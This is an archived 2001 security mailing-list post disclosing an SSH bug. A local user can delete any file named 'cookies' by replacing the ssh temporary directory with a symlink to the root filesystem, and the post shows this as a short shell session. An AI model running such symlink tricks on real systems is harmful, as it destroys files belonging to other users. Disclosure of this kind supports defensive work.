mailing list archives
SSH allows deletion of other users files...
From: <zen-parse () gmx net>
Date: Mon, 4 Jun 2001 22:14:29 +1200 (NZST)
SSH allows deletion of other users files.
You can delete any file on the filesystem you want...
as long as its called cookies.
Not really a very useful bug, but could cause annoyances to
people who actually like their cookies.
[root () clarity /root]# touch /cookies;ls /cookies
[root () clarity /root]# ssh zen () localhost
zen () localhost's password:
Last login: Mon Jun 4 20:22:39 2001 from localhost.local
Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
[zen () clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
[zen () clarity zen]$ logout
Connection to localhost closed.
[root () clarity /root]# ls /cookies
/bin/ls: /cookies: No such file or directory
- SSH allows deletion of other users files... zen-parse (Jun 04)